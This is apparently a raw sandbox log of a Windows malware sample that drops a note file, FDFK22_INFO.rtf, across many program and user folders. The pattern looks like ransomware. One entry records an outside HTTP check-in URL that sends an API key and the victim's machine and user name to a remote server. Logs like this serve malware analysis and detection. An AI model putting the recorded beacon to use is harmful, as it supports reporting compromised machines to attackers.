a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Recorded TV\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Downloads\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00008352\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\Links for United States\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Microsoft Help\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\skins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\plugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe HTTP URL 10 http://ghb.timerz.org/addrecord.php?apikey=fdfk22_api_key&compuser=AVGLFESB|Admin&sid=QDt9lZpMWmiaUx2c&phase=[FIN]659FAAE06715E629|3287|53|3340 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\include\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Recovery\f840bc82-aff2-11ea-839f-f21450b4f854\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Documents\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\cmm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\All Users\Microsoft\MF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Links\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\db\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\features\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1131729243-447456001-3632642222-1000\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\deploy\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created 